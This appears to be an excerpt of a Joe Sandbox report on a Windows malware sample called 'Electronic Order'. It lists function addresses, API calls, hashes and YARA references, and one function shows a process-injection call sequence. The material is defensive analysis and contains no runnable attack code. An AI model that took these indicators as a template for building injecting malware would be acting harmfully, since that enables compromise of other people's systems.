                                        • Part of subcall function 00DE2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00DE9C64), ref: 00DE2FA9
                                        • Part of subcall function 00DE2F95: GetLastError.KERNEL32(00000000,?,00DE9C64), ref: 00DE2FBB
                                      • _free.LIBCMT ref: 00E28FB6
                                      • _free.LIBCMT ref: 00E28FC8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 7d3b2028e624efae88516297b2f19128b0b5a47fb3bf7ffb404a5919715f4e12
                                      • Instruction ID: 9d7b3b71113e7af3179a3c923e6a66787b7d99f1bbc61beb22d8bf5a3029c993
                                      • Opcode Fuzzy Hash: 7d3b2028e624efae88516297b2f19128b0b5a47fb3bf7ffb404a5919715f4e12
                                      • Instruction Fuzzy Hash: 1EE012B170A7554AEA24B6BABF40AA357EE9F48355718181DB40DEB142DE24E8418134
                                      Function 00DCAB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: CALL
                                      • API String ID: 0-4196123274
                                      • Opcode ID: bb6f918ac35deea30609d94a2265702a08befc3d05513a42037dd6a1a1283916
                                      • Instruction ID: 93e6369a5bf7cce5bebc5b994b2175c1382703253ce437af5616d55c701f585e
                                      • Opcode Fuzzy Hash: bb6f918ac35deea30609d94a2265702a08befc3d05513a42037dd6a1a1283916
                                      • Instruction Fuzzy Hash: 93223674608246CFC724DF18C495F6ABBE1FF44304F19895DE89A9B262D731EC85CBA2
                                      Function 00DC492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                      Download Yara Rule
                                      APIs
                                      • IsThemeActive.UXTHEME ref: 00DC4992
                                        • Part of subcall function 00DE35AC: __lock.LIBCMT ref: 00DE35B2
                                        • Part of subcall function 00DE35AC: DecodePointer.KERNEL32(00000001,?,00DC49A7,00E181BC), ref: 00DE35BE
                                        • Part of subcall function 00DE35AC: EncodePointer.KERNEL32(?,?,00DC49A7,00E181BC), ref: 00DE35C9
                                        • Part of subcall function 00DC4A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00DC4A73
                                        • Part of subcall function 00DC4A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00DC4A88
                                        • Part of subcall function 00DC3B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00DC3B7A
                                        • Part of subcall function 00DC3B4C: IsDebuggerPresent.KERNEL32 ref: 00DC3B8C
                                        • Part of subcall function 00DC3B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00E862F8,00E862E0,?,?), ref: 00DC3BFD
                                        • Part of subcall function 00DC3B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00DC3C81
                                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00DC49D2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                      • String ID:
                                      • API String ID: 1438897964-0
                                      • Opcode ID: 261c54fac58d9da5917ee06ecdcf9c44415c6271aa75f5395b1dc287a6fe94a1
                                      • Instruction ID: ca32a43b8790d21094bd69c68f254ef0ff959cf0f10a24f53ee30d58ea61a433
                                      • Opcode Fuzzy Hash: 261c54fac58d9da5917ee06ecdcf9c44415c6271aa75f5395b1dc287a6fe94a1
                                      • Instruction Fuzzy Hash: E7118C719183129FC700EF2ADC49A0AFBE8EF94710F00451EF499A72B1DB709549CBA2
                                      Function 00DC5DF9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00DC5981,?,?,?,?), ref: 00DC5E27
                                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00DC5981,?,?,?,?), ref: 00DFE19C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 522812750d40227a81ebbbeb29797d06ed9241f4f7ef848367e8089d2f1f9c0a
                                      • Instruction ID: 945918a9c1dae03daff725aeacc91d60fc8cab2f33b1bb32ec06a6d07519fab7
                                      • Opcode Fuzzy Hash: 522812750d40227a81ebbbeb29797d06ed9241f4f7ef848367e8089d2f1f9c0a
                                      • Instruction Fuzzy Hash: 29017970244709BEF7250E15DC86F76379CEB05768F14C319FAE56B1E0C6B46E858B60
                                      Function 00DE0FF6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DE594C: __FF_MSGBANNER.LIBCMT ref: 00DE5963
                                        • Part of subcall function 00DE594C: __NMSG_WRITE.LIBCMT ref: 00DE596A
                                        • Part of subcall function 00DE594C: RtlAllocateHeap.NTDLL(01590000,00000000,00000001,00000000,?,?,?,00DE1013,?), ref: 00DE598F
                                      • std::exception::exception.LIBCMT ref: 00DE102C
                                      • __CxxThrowException@8.LIBCMT ref: 00DE1041
                                        • Part of subcall function 00DE87DB: RaiseException.KERNEL32(?,?,?,00E7BAF8,00000000,?,?,?,?,00DE1046,?,00E7BAF8,?,00000001), ref: 00DE8830
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                      • String ID:
                                      • API String ID: 3902256705-0
                                      • Opcode ID: 2f0b142acd3530958669dcea8a5c86627b235c744bdb3dfdf64adab2306cfcb5
                                      • Instruction ID: 01728528240980f2795801546aa6bc4c58029e65704eae0357b8029b1f047edc
                                      • Opcode Fuzzy Hash: 2f0b142acd3530958669dcea8a5c86627b235c744bdb3dfdf64adab2306cfcb5
                                      • Instruction Fuzzy Hash: 12F0C83960039DA6CB20BA5AEC169DF7BACDF01351F500429FD08A6691DFB1CA8497F1
                                      Function 00DE582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: __lock_file_memset
                                      • String ID:
                                      • API String ID: 26237723-0
                                      • Opcode ID: 5da88490bacbead166213e62477c02d1488cc55c245288a274595113011ab568
                                      • Instruction ID: b489864ea5da377694bc96c679f230cf64ee34996c9185af8f10127b6db69470
                                      • Opcode Fuzzy Hash: 5da88490bacbead166213e62477c02d1488cc55c245288a274595113011ab568
                                      • Instruction Fuzzy Hash: 58018871C00685EBCF12BF679C0559F7B61EF403A4F148215F8185B1A5DB31CA11EBB1
                                      Function 00DE55D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DE8D68: __getptd_noexit.LIBCMT ref: 00DE8D68
                                      • __lock_file.LIBCMT ref: 00DE561B
                                        • Part of subcall function 00DE6E4E: __lock.LIBCMT ref: 00DE6E71
                                      • __fclose_nolock.LIBCMT ref: 00DE5626
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                      • String ID:
                                      • API String ID: 2800547568-0
                                      • Opcode ID: 8dc94b9227b7383745f57a11bdef809e6b29e8ddd92fc0d5106e4db0a4dd438f
                                      • Instruction ID: c84237ab07e9a80774e9824d91f7b907ced2f904697e56053a4fb834bf4e892a
                                      • Opcode Fuzzy Hash: 8dc94b9227b7383745f57a11bdef809e6b29e8ddd92fc0d5106e4db0a4dd438f
                                      • Instruction Fuzzy Hash: 12F02471800B809AD720BF779C0276E77A0AF013B8F54820DE428AB0C5CF7C8901AB71
                                      Function 00DC81C1 Relevance: 2.6, APIs: 2, Instructions: 54COMMON
                                      Download Yara Rule
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,00DC558F,?,?,?,?,?), ref: 00DC81DA
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,00DC558F,?,?,?,?,?), ref: 00DC820D
                                        • Part of subcall function 00DC78AD: _memmove.LIBCMT ref: 00DC78E9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$_memmove
                                      • String ID:
                                      • API String ID: 3033907384-0
                                      • Opcode ID: 859a5b3f6f2396fc72fb1e79a96db119c6b7d09a082e20f68982c66702e50345
                                      • Instruction ID: 563e28b8244e3fb7c1311b3fe5339dc5fb3c65afaebf1ccac694266e19f53dfb
                                      • Opcode Fuzzy Hash: 859a5b3f6f2396fc72fb1e79a96db119c6b7d09a082e20f68982c66702e50345
                                      • Instruction Fuzzy Hash: 17018B35201105BEEB256A26DD4AF7B7B6CEF8A760F10802AFD05DE291DE20D8009671
                                      Function 0158129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 01581A5B
                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01581AF1
                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01581B13
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125986808.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1580000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                      • String ID:
                                      • API String ID: 2438371351-0
                                      • Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                      • Instruction ID: fb989335526b8581443d8bfdc71fafa2e065fbdbe2843fb9fc8649fb7d4f4a63
                                      • Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                      • Instruction Fuzzy Hash: EA12DD24E24658C6EB24DF64D8507DEB272FF68300F1090E9910DEB7A5E77A4F81CB5A
                                      Function 00DD2123 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 810f52481ffd6ce86e87dd7045c3a61bdb63c4415a387adc0640db6e9240454d
                                      • Instruction ID: 4b5f9e7661580dbbf1aa220400ef328d7e54f9209e19dc54919a33b9e7c40c7c
                                      • Opcode Fuzzy Hash: 810f52481ffd6ce86e87dd7045c3a61bdb63c4415a387adc0640db6e9240454d
                                      • Instruction Fuzzy Hash: 5F517C35700605AFCF14EB64C996FAE77A6EF84310F1481A9F946AB392CA30ED40CB71
                                      Function 00DC5C4E Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00DC5CF6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: FilePointer
                                      • String ID:
                                      • API String ID: 973152223-0
                                      • Opcode ID: 27c810f5c2c8560f12aac949f44a81f2f630342f72aee02b78c08c58e26735fd
                                      • Instruction ID: a3206bffc1856306ab93ebdae144a9edc2eae07c4fdd6722fde4a8d3a408c9c9
                                      • Opcode Fuzzy Hash: 27c810f5c2c8560f12aac949f44a81f2f630342f72aee02b78c08c58e26735fd
                                      • Instruction Fuzzy Hash: AD313E71A00B0AAFCB18DF2DD584B6DB7B5FF44320F188619D81993714D771B9A0DBA0
                                      Function 00E000D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ClearVariant
                                      • String ID:
                                      • API String ID: 1473721057-0
                                      • Opcode ID: 7cc45ab935ffacc6069f1661595acb9c678a2800d8e2d8b53f5b8485f3d5ab42
                                      • Instruction ID: 037108e1cae4b23803792b6c821442f91853313ae065fbcdd6bf42d06cadcb3f
                                      • Opcode Fuzzy Hash: 7cc45ab935ffacc6069f1661595acb9c678a2800d8e2d8b53f5b8485f3d5ab42
                                      • Instruction Fuzzy Hash: B341F574608351CFDB24DF18C484B1ABBE0BF45318F19889CE89A5B762C736E885CB62
                                      Function 00DC4F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DC4D13: FreeLibrary.KERNEL32(00000000,?), ref: 00DC4D4D
                                        • Part of subcall function 00DE548B: __wfsopen.LIBCMT ref: 00DE5496
                                      • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00E862F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00DC4F6F
                                        • Part of subcall function 00DC4CC8: FreeLibrary.KERNEL32(00000000), ref: 00DC4D02
                                        • Part of subcall function 00DC4DD0: _memmove.LIBCMT ref: 00DC4E1A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Library$Free$Load__wfsopen_memmove
                                      • String ID:
                                      • API String ID: 1396898556-0
                                      • Opcode ID: ecdb258fb04e0ee8653d7530e6d9d652e9f869651b7140bf74dc52a7a7e1a752
                                      • Instruction ID: dafd6ed8f8765608b30f6ce2e6f81d292d3894327476f5a17e0a1ba19cd62b2b
                                      • Opcode Fuzzy Hash: ecdb258fb04e0ee8653d7530e6d9d652e9f869651b7140bf74dc52a7a7e1a752
                                      • Instruction Fuzzy Hash: 3711E33160030AAACF10FF70DC66FAE77A9DF80711F20842DF942A71C5DA719A059BB0
                                      Function 00E001AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ClearVariant
                                      • String ID:
                                      • API String ID: 1473721057-0
                                      • Opcode ID: 8a051d0c96e1d5083bdc6acb4a137a0270b5c6376143e4c786285d0bbfa74dd7
                                      • Instruction ID: 155b70be8b612ee9f6e7fb7fe43f6f19a1e97ea6568b73b94540fd800c0ae393
                                      • Opcode Fuzzy Hash: 8a051d0c96e1d5083bdc6acb4a137a0270b5c6376143e4c786285d0bbfa74dd7
                                      • Instruction Fuzzy Hash: 7821FF78608342DFCB14DF68C445B1ABBE4BB84718F09896CF98A57761D731E845CBA2
                                      Function 00DC78AD Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID:
                                      • API String ID: 4104443479-0
                                      • Opcode ID: e0b0f1feff7007f9a685850875a5a6e1ea6a23f504afe070e1a0459631d1335c
                                      • Instruction ID: 7f6799573af75e8c2281223691f05534ed90bcbee892dace6991c71cd097cab7
                                      • Opcode Fuzzy Hash: e0b0f1feff7007f9a685850875a5a6e1ea6a23f504afe070e1a0459631d1335c
                                      • Instruction Fuzzy Hash: 1811A5722092176BC715AB2CD881F6AB79DEF49320718422EFD56C7290DF31AC109FB0
                                      Function 00DC5D20 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00DC5807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00DC5D76
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: FileRead
                                      • String ID:
                                      • API String ID: 2738559852-0
                                      • Opcode ID: ee1397170c46469c967ebd10ebb8f906046529226098928f3cb37b1666062734
                                      • Instruction ID: 8e5a1d6a88b1203259be89680e20b4a7f91f332951de3f704de93225f0d16511
                                      • Opcode Fuzzy Hash: ee1397170c46469c967ebd10ebb8f906046529226098928f3cb37b1666062734
                                      • Instruction Fuzzy Hash: 61112571200B029FD3208F15E888F62B7E9EB45760F14892EE4AB87A54D7B1F985CB60
                                      Function 00DE4A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                      Download Yara Rule
                                      APIs
                                      • __lock_file.LIBCMT ref: 00DE4AD6
                                        • Part of subcall function 00DE8D68: __getptd_noexit.LIBCMT ref: 00DE8D68
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: __getptd_noexit__lock_file
                                      • String ID:
                                      • API String ID: 2597487223-0
                                      • Opcode ID: 4529e9b210220bdf501e779fefb68c204d8375e6f0d6d3ef47b71fce6a42d4c9
                                      • Instruction ID: b97c5e5ca00e55270b73879da5436c2f823c48c1b97f9dd7b55479727e710ed9
                                      • Opcode Fuzzy Hash: 4529e9b210220bdf501e779fefb68c204d8375e6f0d6d3ef47b71fce6a42d4c9
                                      • Instruction Fuzzy Hash: 17F031319402899BDB51BF668C0679E7661EF00329F188514B428AA1D1DB788951EF75
                                      Function 00DC4FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                      Download Yara Rule
                                      APIs
